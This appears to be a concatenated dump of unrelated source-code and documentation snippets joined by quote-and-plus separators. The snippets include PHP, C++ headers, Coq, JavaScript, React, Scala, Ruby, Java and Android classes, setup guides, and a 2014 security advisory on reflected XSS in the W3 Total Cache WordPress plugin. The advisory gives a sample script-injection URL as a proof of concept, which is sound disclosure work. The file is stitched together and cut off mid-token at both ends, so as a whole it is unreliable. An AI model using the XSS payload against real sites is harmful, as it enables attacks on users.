*\n\t * @param array $args Optional. Rollback arguments. Default is an empty array.\n\t */\n\tpublic function __construct( $args = [] ) {\n\t\tforeach ( $args as $key => $value ) {\n\t\t\t$this->{$key} = $value;\n\t\t}\n\t}" +"// Copyright 2013 The Chromium Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style license that can be\n// found in the LICENSE file.\n\n#ifndef MOJO_SYSTEM_MESSAGE_IN_TRANSIT_H_\n#define MOJO_SYSTEM_MESSAGE_IN_TRANSIT_H_\n\n#include <stdint.h>\n\n#include \"base/macros.h\"\n#include \"mojo/system/system_impl_export.h\"\n\nnamespace mojo {\nnamespace system {\n\n// This class is used to represent data in transit. It is thread-unsafe.\n// Note: This class is POD.\nclass MOJO_SYSTEM_IMPL_EXPORT MessageInTransit {\n public:\n typedef uint16_t Type;\n // Messages that are forwarded to |MessagePipeEndpoint|s.\n static const Type kTypeMessagePipeEndpoint = 0;\n // Messages that are forwarded to |MessagePipe|s.\n static const Type kTypeMessagePipe = 1;\n // Messages that are consumed by the channel.\n static const Type kTypeChannel = 2;\n\n typedef uint16_t Subtype;\n // Subtypes for type |kTypeMessagePipeEndpoint|:\n static const Subtype kSubtypeMessagePipeEndpointData = 0;\n // Subtypes for type |kTypeMessagePipe|:\n static const Subtype kSubtypeMessagePipePeerClosed = 0;\n\n typedef uint32_t EndpointId;\n // Never a valid endpoint ID.\n static const EndpointId kInvalidEndpointId = 0;\n\n // Messages (the header and data) must always be aligned to a multiple of this\n // quantity (which must be a power of 2).\n static const size_t kMessageAlignment = 8;\n\n // Creates a |MessageInTransit| of the given |type| and |subtype|, with\n // message data given by |bytes|/|num_bytes|." +"#ifndef NS_NOWARNINGS_H\r\n#define NS_NOWARNINGS_H\r\n\r\n//\r\n// Syntax help:\r\n//\r\n//#pragma warning( warning-specifier : warning-number-list [,warning-specifier : warning-number-list...] )\r\n//\r\n//#pragma warning( push[ , n ] )\r\n//\r\n//#pragma warning( pop )\r\n//\r\n//Allows selective modification of the behavior of compiler warning messages.\r\n//\r\n//The warning-specifier can be one of the following.\r\n//\r\n//Warning-specifier Meaning \r\n//once Display the specified message(s) only once. \r\n//default Apply the default compiler behavior to the specified message(s). \r\n//1, 2, 3, 4 Apply the given warning level to the specified warning message(s). \r\n//disable Do not issue the specified warning message(s). \r\n//error Report the specified warnings as errors. \r\n//\r\n//\r\n//The warning-number-list can contain any warning numbers. Multiple options can be specified in the same pragma directive as follows:\r\n//\r\n//#pragma warning( disable : 4507 34; once : 4385; error : 164 )\r\n//\r\n//This is functionally equivalent to:\r\n//\r\n//#pragma warning( disable : 4507 34 ) // Disable warning messages\r\n//// 4507 and 34.\r\n//#pragma warning( once : 4385 ) // Issue warning 4385\r\n//// only once.\r\n//#pragma warning( error : 164 ) // Report warning 164\r\n//// as an error.\r\n\r\n#pragma warning (disable: 4786)\r\n#pragma warning (disable: 4530)\r\n#pragma warning (disable: 4800)\r\n\r\n// Signed/float conversions. Disabled" +"---\nid: version-v1.16.0-throttling-queued-executions\ntitle: Throttling queued executions\nhide_title: true\noriginal_id: throttling-queued-executions\n---\n\n# Throttling queued executions\n\nIn this entry, we will walkthrough how to create an SQS queue for scheduling executions which will be used to limit those executions to a maximum concurrency. And we will see how to configure our Cumulus workflows/rules to use this queue.\n\nWe will also review the architecture of this feature and highlight some implementation notes.\n\nLimiting the number of executions that can be running from a given queue is useful for controlling the cloud resource usage of workflows that may be lower priority, such as granule reingestion or reprocessing campaigns. It could also be useful for preventing workflows from exceeding known resource limits, such as a maximum number of open connections to a data provider.\n\n## Implementing the queue\n\n### Create and deploy the queue\n\n#### Add a new queue\n\nIn a `.tf` file for your [Cumulus deployment](./../deployment/deployment-readme#deploy-the-cumulus-instance), add a new SQS queue:\n\n```hcl\nresource \"aws_sqs_queue\" \"background_job_queue\" {\n name = \"${var.prefix}-backgroundJobQueue\"\n receive_wait_time_seconds = 20\n visibility_timeout_seconds = 60\n}\n```\n\n#### Set maximum executions for the queue\n\nDefine the `throttled_queues` variable for the `cumulus` module in your [Cumulus deployment](./../deployment/deployment-readme#deploy-the-cumulus-instance) to specify the maximum concurrent executions" +"(* todo(gmm): This file should really be replaced by a real\n * monad library.\n *)\nRequire Import List.\n\nSet Universe Polymorphism.\n\nClass Monad@{d c} (m : Type@{d} -> Type@{c}) : Type :=\n{ ret : forall {t : Type@{d}}, t -> m t\n; bind : forall {t u : Type@{d}}, m t -> (t -> m u) -> m u\n}.\n\nClass MonadExc E (m : Type -> Type) : Type :=\n{ raise : forall {T}, E -> m T\n; catch : forall {T}, m T -> (E -> m T) -> m T\n}.\n\n\nModule MonadNotation.\n Declare Scope monad_scope.\n Delimit Scope monad_scope with monad.\n\n Notation \"c >>= f\" := (@bind _ _ _ _ c f) (at level 50, left associativity) : monad_scope.\n Notation \"f =<< c\" := (@bind _ _ _ _ c f) (at level 51, right associativity) : monad_scope.\n\n Notation \"'mlet' x <- c1 ;; c2\" := (@bind _ _ _ _ c1 (fun x => c2))\n (at level 100, c1 at next level, right associativity, x pattern) : monad_scope.\n\n Notation \"'mlet' ' pat <- c1 ;; c2\" := (@bind _ _ _ _ c1 (fun x => match x with pat =>" +"function syscall(stub, n) {\n switch (n) {\n default:\n console.error(\"NYI syscall\", arguments);\n throw new Error(\"NYI syscall\");\n break;\n \n \n case /*brk*/ 45:\n return 0;\n case /*mmap2*/ 192:\n var instance = stub.instance;\n var memory = instance.exports.memory;\n var requested = arguments[3];\n if (!stub.memory) {\n stub.memory = {\n object: memory,\n currentPosition: memory.buffer.byteLength,\n };\n }\n var cur = stub.memory.currentPosition;\n if (cur + requested > memory.buffer.byteLength) {\n var need = Math.ceil((cur + requested - memory.buffer.byteLength) / 65536);\n memory.grow(need);\n }\n stub.memory.currentPosition += requested;\n return cur;\n }\n}\n\nfunction createWasmceptionStub() {\n var imports = {\n env: {\n __syscall0: (n) => syscall(stub, n),\n __syscall1: (n,a) => syscall(stub, n, a),\n __syscall2: (n,a,b) => syscall(stub, n, a, b),\n __syscall3: (n,a,b,c) => syscall(stub, n, a, b, c),\n __syscall4: (n,a,b,c,d) => syscall(stub, n, a, b, c, d),\n __syscall5: (n,a,b,c,d,e) => syscall(stub, n, a, b, c, d, e),\n __syscall6: (n,a,b,c,d,e,f) => syscall(stub, n, a, b, c, d, e, f),\n },\n };\n var stub = {\n imports,\n instance: null,\n memory: null,\n };\n return stub;\n}" +"#!/usr/bin/php\r\n<?php\r\n/**\r\n * Plugin: UPNP router\r\n * Author: Sebastian S. (scitor@@el337.de)\r\n * Version: 0.1 (TESTING)\r\n *\r\n * Munin (http://munin.projects.linpro.no/) plugin for monitoring traffic on UPNP enabled routers.\r\n *\r\n * Requirements:\r\n ***************\r\n * - PHP (translate it for performance gain)\r\n * - upnpc (MiniUPnP client: http://miniupnp.tuxfamily.org/)\r\n *\r\n * Usage:\r\n ********\r\n * Copy to upnp_router_ your munin plugins directory (/usr/share/munin/plugins) and execute:\r\n *\r\n * $ munin-node-configure --shell\r\n *\r\n * Don't forget to enable UPNP on your router, the script should find any connections automatically.\r\n * Change the path of your upnpc binary if you didn't make install it.\r\n *\r\n ********************\r\n * TESTING VERSION! *\r\n ********************\r\n * Please Note: This version was only tested on one single router so far.\r\n * I tried to make the router detection pretty general, but you never know.\r\n * If you have a router with enabled upnp not being detected by this script\r\n * feel free to send me an email with your output of:\r\n *\r\n * $ upnpc -s\r\n *\r\n * command.\r\n *\r\n * Changelog:\r\n ************\r\n * version 0.1 - 26 Aug, 2009\r\n * Sebastian S. <scitor@@el337.de>\r\n * - initial author\r\n *\r\n **/\r\n#%# family=auto\r\n#%# capabilities=autoconf suggest\r\n\r\n $result = explode(\"\\n\",shell_exec('/usr/bin/upnpc -s'));\r\n\r\n foreach($result as $line)" +"// @flow strict\nimport * as React from 'react';\nimport styled, { type StyledComponent, css } from 'styled-components';\nimport numeral from 'numeral';\n\nimport type { ThemeInterface } from 'theme';\nimport Icon from 'components/common/Icon';\nimport type { TrendPreference } from 'views/logic/aggregationbuilder/visualizations/NumberVisualizationConfig';\n\nexport const TREND_BAD = 'primary';\nexport const TREND_GOOD = 'success';\nexport const TREND_NEUTRAL = undefined;\n\ntype Props = {\n current: number,\n previous: ?number,\n trendPreference: TrendPreference,\n};\n\nconst Background: StyledComponent<{trend: ?string}, ThemeInterface, HTMLDivElement> = styled.div(({ theme, trend }) => {\n const { variant } = theme.colors;\n const bgColor = trend && trend === TREND_GOOD ? variant.success : variant.primary;\n\n return css`\n text-align: right;\n ${trend && css`\n background-color: ${bgColor};\n color: ${theme.utils.contrastingColor(bgColor)};\n `}\n `;\n});\n\nconst TextContainer = styled.span`\n margin: 5px;\n`;\n\nconst _background = (delta, trendPreference: TrendPreference) => {\n switch (trendPreference) {\n case 'LOWER':\n return delta > 0 ? TREND_BAD : TREND_GOOD;\n case 'HIGHER':\n return delta > 0 ? TREND_GOOD : TREND_BAD;\n case 'NEUTRAL':\n default:\n return TREND_NEUTRAL;\n }\n};\n\nconst _trendIcon = (delta) => {\n if (delta === 0) {\n return <Icon name=\"arrow-circle-right\" />;\n }\n\n return <Icon name={delta > 0 ? 'arrow-circle-up' : 'arrow-circle-down'} />;\n};\n\nconst Trend = React.forwardRef<Props, any>(({ current, previous, trendPreference }: Props, ref) => {\n const difference = previous" +"secuvera-SA-2014-01: Reflected XSS in W3 Total Cache\n\nAffected Products\n W3 Total Cache 0.9.4 (older releases have not been tested)\n\n \"The only WordPress Performance Optimization (WPO) framework; \n designed to improve user experience and page speed. (..)\n W3 Total Cache improves the user experience of your site by \n increasing server performance, reducing the download times \n and providing transparent content delivery network (CDN) \n integration.\"\n\nReferences\n https://wordpress.org/plugins/w3-total-cache/\n https://www.secuvera.de/advisories/secuvera-SA-2014-01.txt\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8724\n\nSummary:\n If the option \"Page cache debug info\" is enabled, W3 Total \n Cache adds some HTML-Comments including the \"Cache key\" which \n is the URL itself. The URL is just reflected without any output \n encoding.\n\nEffect:\n An attacker could include clientside Scriptcode in a request, \n which will be reflected by the application. Using some social \n engineering an attacker would be able to compromise users of \n the application.\n\nVulnerable Scripts:\n Debug Function\n\nExamples:\n https://$victim/nothing--<script>alert(\"XSS\")</script>\n\nSolution:\n Install bug fix release. Always make sure to disable debug function \n in productive environments.\n\nDisclosure Timeline:\n 2014/09/17 vendor contacted via https://www.w3-edge.com/contact/\n 2014/10/07 vendor reacted including a first patch preview\n 2014/10/14 notified vendor the patch does not address the issue\n 2014/10/24 vendor sent a second patch preview \n 2014/12/10 vendor published 0.9.4.1 release\n 2014/12/16 public disclosure\n\nCredits:\n Tobias Glemser, secuvera GmbH\n tglemser@secuvera.de\n https://www.secuvera.de\n\nDisclaimer:" +"Creating an updated ALEZ install ISO\n\nSometimes ALEZ will fail to install because the archlinux-keyring package included \non the ISO is outdated causing PGP verification of the Arch ZFS repo to fail. If \nthat is the case, you may need to create an updated ISO complete with the ZFS packages, \ngit and the ALEZ downloader. \n\nHere are the steps to manually create an updated ALEZ install ISO:\n\n* Boot into an up-to-date install of Arch (but not under LXD/LXC as the build script \ndoesn't work in a container) and run the following to install the Arch ISO build \nscripts and their dependencies (and git):\n\n# pacman -S archiso git\n\n* Now copy the releng profile directory:\n\n# cp -r /usr/share/archiso/configs/releng ~/aleziso\n\n* Edit ~/aleziso/packages.x86_64 and add the following lines:\n\ngit\narchzfs-linux\n\n* Edit ~/aleziso/pacman.conf and add the following lines:\n\n[archzfs]\nServer = http://archzfs.com/$repo/x86_64\n\n* Import and sign the archzfs repo key:\n\n# pacman-key -r F75D9D76 && pacman-key --lsign-key F75D9D76\n\n(NB You may want to check the key hasn't changed first by checking \nhttps://wiki.archlinux.org/index.php/Unofficial_user_repositories#archzfs )\n\n* Clone the ALEZ repo\n\ngit clone https://github.com/danboid/ALEZ.git\n\n* Make airootfs directory for alez downloader:\n\n# mkdir -p ~/aleziso/airootfs/usr/local/bin\n\n* Copy scripts into airootfs tree:\n\n#" +"package io.github.hamsters\n\nimport scala.util.{Left, Right}\n\n@ValidationMacro\nobject Validation {\n\n val Valid = Right\n val Invalid = Left\n\n /**\n * Return Either from code block\n * @param body\n * @tparam R\n * @return Either from code block\n */\n def fromCatchable[R](body: => R): Either[String, R] = {\n val throwableToErrorMessage = (t: Throwable) => Option(t.getMessage).getOrElse(\"Error: an exception has been thrown\")\n fromCatchable(body, throwableToErrorMessage)\n }\n\n /**\n * Return Either from code block with custom error management\n * @param body\n * @param errorMgt : error management function\n * @tparam L\n * @tparam R\n * @return Either from code block\n */\n def fromCatchable[L, R](body: => R, errorMgt: Throwable => L): Either[L, R] =\n try {\n Right(body)\n } catch {\n case t: Throwable => Left(errorMgt(t))\n }\n\n /** Return successes (right) for several Either values\n * Validation.run should be used instead in most cases as it is a type-safer method (it does not return a List[Any])\n * @param eithers\n * @return successes\n */\n def successes(eithers : Either[_, _]*) : List[Any] = eithers.toList.collect { case r : Right[_, _] => r.right.get }\n\n /**\n * Tells if eithers contain successes (right)\n * @param eithers\n * @tparam R\n * @return boolean\n */\n def hasSuccesses[R](eithers: Either[_, R]*): Boolean = successes(eithers: _*).nonEmpty\n\n /**\n *" +"rand1024-2-6 \trand1024-2\r\n-1 \t-1.0\r\n150 \t150\r\n1024 \t128\r\n 15 15 8\r\n 6 37 8\r\n 43 35 8\r\n 7 68 8\r\n 7 22 8\r\n 49 22 8\r\n 3 37 8\r\n 67 10 8\r\n 27 68 8\r\n 68 22 8\r\n 45 28 8\r\n 13 62 8\r\n 11 52 8\r\n 15 67 8\r\n 26 13 8\r\n 52 13 8\r\n 52 30 8\r\n 32 52 8\r\n 41 2 8\r\n 53 64 8\r\n 60 18 8\r\n 20 68 8\r\n 59 48 8\r\n 49 39 8\r\n 10 34 8\r\n 49 5 8\r\n 42 26 8\r\n 63 33 8\r\n 47 28 8\r\n 67 42 8\r\n 25 5 8\r\n 36 17 8\r\n 6 1 8\r\n 69 32 8\r\n 4 18 8\r\n 59 29 8\r\n 18 13 8\r\n 39 32 8\r\n 45 14 8\r\n 12 53 8\r\n 65 12 8\r\n 5 68 8\r\n 38 32 8\r\n 57 69 8\r\n 40 17 8\r\n 42 14 8\r\n 37 18 8\r\n 50 34 8\r\n 30 30 8\r\n 36 52 8\r\n 53 34 8\r\n 27 54 8\r\n 61 57 8\r\n 2 23 8\r\n 40 24 8\r\n 5 37 8\r\n 31 30 8\r\n 58 4 8\r\n 68 48 8\r\n 15 23 8\r\n 43 19 8\r\n 33 61 8\r\n 25 65 8\r\n 17 53 8" +"/**\n * @typedef {array} rule - first element is testing function, second element is error\n * testing function has value as the first argument\n * and all values as the second optional argument\n * error can be anything\n */\n/**\n * provided a dictionary of rules and a dictionary of values,\n * return a dictionary of errors for each value\n *\n * @param {Object.<string, rule[]>} ruleDict - dictionary of array of rules\n * @param {Object.<string, any>} valueDict - dictionary of values\n * @returns {Object.<string, any[]>} - dictionary of array of errors\n */\nexport const createValidator = ruleDict => valueDict => {\n const entries = Object.entries(valueDict);\n\n const outputEntries = entries.map(([name, value]) => {\n const rules = ruleDict[name] ?? [];\n const errors = rules\n .filter(([rule]) => !rule(value, valueDict))\n .map(([, error]) => error);\n return [name, errors];\n });\n\n return Object.fromEntries(outputEntries);\n};" +"//\n// Created by @krq_tiger on 13-7-3.\n// Copyright (c) 2013 kariqu. All rights reserved.\n//\n// To change the template use AppCode | Preferences | File Templates.\n//\n\n\n#import <QuartzCore/QuartzCore.h>\n#import \"GuideTipView.h\"\n#import \"PopEpisodeView.h\"\n#import \"Global.h\"\n\n\n@implementation GuideTipView {\n\n}\n\n- (id)initWithFrame:(CGRect)frame tipsText:(NSString *)tipsText {\n self = [super initWithFrame:CGRectMake((MAIN_SCREEN_WIDTH- 200) / 2, MAIN_SCREEN_HEIGHT- 100 - 45 - 20, 200, 100)];\n if (self) {\n UILabel *textLabel = [[UILabel alloc] initWithFrame:CGRectMake(50, 0, 150, 50)];\n textLabel.textAlignment = UITextAlignmentCenter;\n textLabel.textColor = [UIColor whiteColor];\n textLabel.backgroundColor = POP_VIEW_BACKGROUND_COLOR;//[UIColor clearColor];\n textLabel.font = TIPS_TEXT_FONT;\n textLabel.text = tipsText;\n textLabel.numberOfLines = 0;\n textLabel.layer.cornerRadius = 6;\n UIImageView *icon = [[UIImageView alloc] initWithFrame:CGRectMake(MARGIN, 50, 40, 40)];\n icon.image = [UIImage imageNamed:@\"Icon.png\"];\n [self addSubview:icon];\n [self addSubview:textLabel];\n self.backgroundColor = [UIColor clearColor];\n }\n return self;\n}\n\n@end" +"module Admin\n class DisplayAdsController < Admin::ApplicationController\n layout \"admin\"\n\n def index\n @display_ads = DisplayAd.order(id: :desc)\n .joins(:organization)\n .includes([:organization])\n .page(params[:page]).per(50)\n\n return if params[:search].blank?\n\n @display_ads = @display_ads.where(\"organizations.name ILIKE :search\", search: \"%#{params[:search]}%\")\n end\n\n def new\n @display_ad = DisplayAd.new\n end\n\n def edit\n @display_ad = DisplayAd.find(params[:id])\n end\n\n def create\n @display_ad = DisplayAd.new(display_ad_params)\n\n if @display_ad.save\n flash[:success] = \"Display Ad has been created!\"\n redirect_to admin_display_ads_path\n else\n flash[:danger] = @display_ad.errors_as_sentence\n render new_admin_display_ad_path\n end\n end\n\n def update\n @display_ad = DisplayAd.find(params[:id])\n\n if @display_ad.update(display_ad_params)\n flash[:success] = \"Display Ad has been updated!\"\n redirect_to admin_display_ads_path\n else\n flash[:danger] = @display_ad.errors_as_sentence\n render :edit\n end\n end\n\n def destroy\n @display_ad = DisplayAd.find(params[:id])\n\n if @display_ad.destroy\n flash[:success] = \"Display Ad has been deleted!\"\n redirect_to admin_display_ads_path\n else\n flash[:danger] = \"Something went wrong with deleting the Display Ad.\"\n render :edit\n end\n end\n\n private\n\n def display_ad_params\n params.permit(:organization_id, :body_markdown, :placement_area, :published, :approved)\n end\n\n def authorize_admin\n authorize DisplayAd, :access?, policy_class: InternalPolicy\n end\n end\nend" +"package lemongrenade.core.database.lemongraph;\n\nimport org.json.JSONArray;\nimport org.json.JSONObject;\n/**\n * \t(Content-Type: application/json, application/x-msgpack)\n * body should be object w/ the optional kv pairs below\n * {\n * \"seed\": true, // mark any referenced nodes/edges as seeds\n * \"meta\": {}, // same structure as POST /graph, merges graph-level kv pairs\n * 'chains': [], // list of node[to edge to node]* object chains\n * 'nodes': [], // list of nodes\n * 'edges': [], // list of edges\n * }\n */\npublic class LemonGraphObject {\n private boolean isSeed;\n private JSONObject meta;\n private JSONArray nodes;\n private JSONArray edges;\n private JSONArray chains;\n\n public JSONObject get() {\n JSONObject graph = new JSONObject();\n graph.put(\"nodes\", nodes);\n graph.put(\"edges\", edges);\n graph.put(\"seed\", isSeed);\n graph.put(\"meta\", meta);\n graph.put(\"chains\", chains);\n return graph;\n }\n\n public JSONArray getNodes() { return nodes; }\n public void setNodes(JSONArray nodes) { this.nodes = nodes; }\n public JSONArray getEdges() { return edges; }\n public void setEdges(JSONArray edges) { this.edges = edges; }\n public JSONArray getChains() { return chains; }\n public void setChains(JSONArray chains) { this.edges = chains; }\n public JSONObject getMeta() { return meta; }\n public void setMeta(JSONObject meta) { this.meta = meta; }\n public void setSeed(boolean seed) { this.isSeed = seed;}\n public boolean getSeed() { return this.isSeed; }\n\n public LemonGraphObject(boolean isSeed, JSONObject" +"package edu.neu.ccs.pyramid.optimization;\n\nimport org.apache.mahout.math.DenseVector;\nimport org.apache.mahout.math.Vector;\n\n/**\n * Numerical Optimization, Second Edition, Jorge Nocedal Stephen J. Wright\n * algorithm 5.4\n * Created by chengli on 12/9/14.\n */\npublic class ConjugateGradientDescent extends GradientValueOptimizer implements Optimizer{\n private BackTrackingLineSearcher lineSearcher;\n private Vector oldP;\n private Vector oldGradient;\n\n\n public ConjugateGradientDescent(Optimizable.ByGradientValue function) {\n super(function);\n this.lineSearcher = new BackTrackingLineSearcher(function);\n // we need to make a copy of the gradient; should not use pointer\n this.oldGradient = new DenseVector(function.getGradient());\n this.oldP = oldGradient.times(-1);\n }\n\n public void iterate(){\n Vector direction = this.oldP;\n lineSearcher.moveAlongDirection(direction);\n Vector newGradient = function.getGradient();\n double beta = newGradient.dot(newGradient)/oldGradient.dot(oldGradient);\n Vector newP = oldP.times(beta).minus(newGradient);\n oldP = newP;\n oldGradient = newGradient;\n terminator.add(function.getValue());\n }\n\n public BackTrackingLineSearcher getLineSearcher() {\n return lineSearcher;\n }\n}" +"include ../mixins/container\n\nmixin PatchEquipment(values)\n +container(values)\n p When <strong>you attempt to amend an armor or shield</strong>, envision how provisions from your gear help you patch the piece of equipment and suffer -2 supply. Then, roll +wits.\n p On a <strong>strong hit</strong>, your amendment is efficient. Choose one.\n ul\n li Rise by 1 your armor\u2019s protection.\n li Rise by 1 your armor\u2019s Endure Harm addition.\n li Rise by 1 your shield\u2019s Face Danger/Clash addition.\n p On a <strong>weak hit</strong>, as above, but the patch work takes longer than expected or demand extra resources. Suffer -2 momentum.\n p On a <strong>miss</strong>, your craft is ineffective. <em>Pay the Price</em>." +"package io.github.droidkaigi.confsched2017.viewmodel;\n\nimport android.databinding.BaseObservable;\nimport android.support.annotation.NonNull;\nimport android.view.View;\n\nimport io.github.droidkaigi.confsched2017.model.Contributor;\nimport io.github.droidkaigi.confsched2017.view.helper.Navigator;\n\npublic class ContributorViewModel extends BaseObservable implements ViewModel {\n\n private final Navigator navigator;\n\n private Contributor contributor;\n\n private String name;\n\n private String avatarUrl;\n\n private String htmlUrl;\n\n private int contributions;\n\n public ContributorViewModel(Navigator navigator, @NonNull Contributor contributor) {\n this.navigator = navigator;\n this.contributor = contributor;\n this.avatarUrl = contributor.avatarUrl;\n this.name = contributor.name;\n this.htmlUrl = contributor.htmlUrl;\n this.contributions = contributor.contributions;\n }\n\n @Override\n public void destroy() {\n // Nothing to do\n }\n\n public void onClickContributor(@SuppressWarnings(\"UnusedParameters\") View view) {\n navigator.navigateToWebPage(htmlUrl);\n }\n\n public int getContributions() {\n return contributions;\n }\n\n public Contributor getContributor() {\n return contributor;\n }\n\n public String getName() {\n return name;\n }\n\n public String getAvatarUrl() {\n return avatarUrl;\n }\n\n public String getHtmlUrl() {\n return htmlUrl;\n }\n}" +"#!/bin/bash -e\n\n# Shell script to initialize a pip-accel test environment.\n#\n# Author: Peter Odding <peter.odding@paylogic.com>\n# Last Change: March 14, 2016\n# URL: https://github.com/paylogic/pip-accel\n#\n# This shell script is used in tox.ini and .travis.yml to prepare\n# virtual environments for running the pip-accel test suite.\n\nmain () {\n\n # Install the dependencies of pip-accel.\n msg \"Installing dependencies ..\"\n pip install --quiet --requirement=requirements.txt\n\n # Install pip-accel in editable mode. The LC_ALL=C trick makes sure that the\n # setup.py script works regardless of the user's locale (this is all about\n # that little copyright symbol at the bottom of README.rst :-).\n msg \"Installing pip-accel (in editable mode) ..\"\n LC_ALL=C pip install --quiet --editable .\n\n # Install the test suite's dependencies. We ignore py.test wheels because of\n # an obscure issue that took me hours to debug and I really don't want to get\n # into it here :-(.\n msg \"Installing test dependencies ..\"\n pip install --no-binary=pytest --quiet --requirement=$PWD/requirements-testing.txt\n\n # Make it possible to install local working copies of selected dependencies.\n install_working_copies\n\n # Install requests==2.6.0 so the test suite can downgrade to requests==2.2.1\n # (to verify that downgrading of packages works).\n install_requests\n\n # Remove iPython so the test suite can" +"package ml.docilealligator.infinityforreddit.AsyncTask;\n\nimport android.os.AsyncTask;\n\nimport ml.docilealligator.infinityforreddit.Account.Account;\nimport ml.docilealligator.infinityforreddit.Account.AccountDao;\n\npublic class ParseAndInsertNewAccountAsyncTask extends AsyncTask<Void, Void, Void> {\n\n private String username;\n private String accessToken;\n private String refreshToken;\n private String profileImageUrl;\n private String bannerImageUrl;\n private int karma;\n private String code;\n private AccountDao accountDao;\n private ParseAndInsertAccountListener parseAndInsertAccountListener;\n public ParseAndInsertNewAccountAsyncTask(String username, String accessToken, String refreshToken, String profileImageUrl, String bannerImageUrl,\n int karma, String code, AccountDao accountDao,\n ParseAndInsertAccountListener parseAndInsertAccountListener) {\n this.username = username;\n this.accessToken = accessToken;\n this.refreshToken = refreshToken;\n this.profileImageUrl = profileImageUrl;\n this.bannerImageUrl = bannerImageUrl;\n this.karma = karma;\n this.code = code;\n this.accountDao = accountDao;\n this.parseAndInsertAccountListener = parseAndInsertAccountListener;\n }\n\n @Override\n protected Void doInBackground(Void... voids) {\n Account account = new Account(username, accessToken, refreshToken, code, profileImageUrl,\n bannerImageUrl, karma, true);\n accountDao.markAllAccountsNonCurrent();\n accountDao.insert(account);\n return null;\n }\n\n @Override\n protected void onPostExecute(Void aVoid) {\n parseAndInsertAccountListener.success();\n }\n\n public interface ParseAndInsertAccountListener {\n void success();\n }\n}" +"HTML Agility Pack V1.3.0.0\n\nThis directory contains the HtmlAgilityPack solution and source code and this readme file. The other directories are:\n\n+ Doc\t\t\tContains the HtmlAgilityPack assembly documentation as a .CHM file\n+ Samples\t\tContains some HtmlAgilityPack samples\n + GetDocLinks\t\tA sample that determines all linked files and references of a givn HTML document\n + Html2Txt\t\tA sample that converts an HTML document into a plain text .txt file\n + Html2Xml\t\tA sample that converts an HTML document into an XML file\n + HtmlToRss\t\tA sample that converts an HTML file into an RSS feed. Two methods are demonstrated.\n\nSimon Mourier\nJune 2003" +"/*\n * Copyright LWJGL. All rights reserved.\n * License terms: https://www.lwjgl.org/license\n */\npackage opengl.templates\n\nimport opengl.*\n\nval ARB_transform_feedback_instanced = \"ARBTransformFeedbackInstanced\".nativeClassGL(\"ARB_transform_feedback_instanced\") {\n documentation =\n \"\"\"\n Native bindings to the $registryLink extension.\n\n Multiple instances of geometry may be specified to the GL by calling functions such as #DrawArraysInstanced() and #DrawElementsInstanced().\n Further, the results of a transform feedback operation may be returned to the GL by calling #DrawTransformFeedback(), or\n #DrawTransformFeedbackStream(). However, it is not presently possible to draw multiple instances of data transform feedback without using a query\n and the resulting round trip from server to client.\n\n This extension adds functionality to draw multiple instances of the result of a transform feedback operation.\n\n Requires ${GL40.core} or ${ARB_transform_feedback2.link}. Requires ${GL31.core} or ${ARB_draw_instanced.link}. ${GL42.promoted}\n \"\"\"\n\n GL42C reuse \"DrawTransformFeedbackInstanced\"\n GL42C reuse \"DrawTransformFeedbackStreamInstanced\"\n}" +"require 'open-uri'\n# Worker that takes care of comparing the snapshot image against the baseline.\n# This worker is responsible for updating the snapshot instance with the result\n# of the snapshot comparison.\nclass SnapshotComparerWorker < SnapshotWorker\n def perform(snapshot_id)\n return unless set_snapshot(snapshot_id)\n return unless @snapshot.compare?\n\n url = @snapshot.url\n viewport = @snapshot.viewport\n compare_with = @snapshot.compared_with || url.baseline(viewport)\n\n Rails.logger.info \"Comparing snapshot of #{url} @ #{viewport} \" +\n 'against baseline'\n comparison = Diffux::SnapshotComparer.new(to_chunky_png(compare_with),\n to_chunky_png(@snapshot)).compare!\n diff = @snapshot.build_snapshot_diff(comparison.slice(:diff_in_percent))\n diff.before_snapshot = compare_with\n diff_image = comparison[:diff_image]\n if diff_image\n diff.image_height = diff_image.height\n diff.image_width = diff_image.width\n FileUtil.with_tempfile do |tempfile|\n diff_image.save(tempfile)\n diff.image = File.open(tempfile)\n end\n end\n @snapshot.accept if diff.diff_in_percent == 0\n\n @snapshot.transaction do\n diff.save!\n comparison[:diff_clusters].each do |cluster|\n diff.snapshot_diff_clusters.create!(cluster)\n end\n @snapshot.compared_with = compare_with\n @snapshot.save!\n end\n end\n\n private\n\n # @param snapshot [Snapshot]\n # @return [ChunkyPNG::Image]\n def to_chunky_png(snapshot)\n case snapshot.image.options[:storage]\n when :s3\n ChunkyPNG::Image.from_io(open(snapshot.image.url))\n when :filesystem\n ChunkyPNG::Image.from_file(snapshot.image.path)\n end\n end\nend" +"---\norder: 9\ntitle:\n zh-CN: \u5355\u680f\u9009\u62e9\n en-US: single menu select\n---\n\n## zh-CN\n\n\u6bcf\u6b21\u9009\u9879\u90fd\u53ea\u53ef\u4ee5\u9009\u62e9\u4e00\u4e2amenu\u5f39\u51fa\uff0c\u53ef\u4ee5\u5b9e\u73b0\u5927\u91cf\u6570\u636e\u7684\u9009\u62e9\u60c5\u51b5\u3002\u53ef\u4ee5\u901a\u8fc7\u5934\u90e8\u6765\u5207\u6362\u9009\u62e9\u5c42\u7ea7\n\n## en-US\n\nOnly one menu pop-up can be selected for each option, which can realize the selection of large amounts of data. You can switch the selection level through the head\n\n````jsx\nimport { Cascader } from 'choerodon-ui';\n\nconst options = [{\n value: 'chengdu',\n label: '\u6210\u90fd',\n isLeaf: false,\n}, {\n value: 'lanjin',\n label: '\u5357\u4eac',\n isLeaf: false,\n},{\n value: 'LA',\n label: 'LA',\n isLeaf: false,\n}, {\n value: 'Boston',\n label: 'Boston',\n isLeaf: false,\n}];\n\nclass LazyOptions extends React.Component {\n state = {\n options,\n };\n\n onChange = (value, selectedOptions) => {\n console.log(value, selectedOptions)\n }\n\n loadData = (selectedOptions) => {\n const targetOption = selectedOptions[selectedOptions.length - 1];\n targetOption.loading = true;\n\n // load options lazily\n setTimeout(() => {\n targetOption.loading = false;\n targetOption.children = [{\n label: `In da house`,\n value: 'dynamic1',\n }, {\n label: `Dynamic`,\n value: 'dynamic2',\n }];\n this.setState({\n options: [...this.state.options],\n });\n }, 1000);\n }\n\n render() {\n return (\n <Cascader\n allowClear\n options={this.state.options}\n loadData={this.loadData}\n onChange={this.onChange}\n changeOnSelect\n menuMode=\"single\"\n />\n );\n }\n}\n\nReactDOM.render(<LazyOptions />, mountNode);\n````" +"package org.knowm.xchange.therock.service;\n\nimport java.io.IOException;\nimport java.util.Date;\nimport org.knowm.xchange.Exchange;\nimport 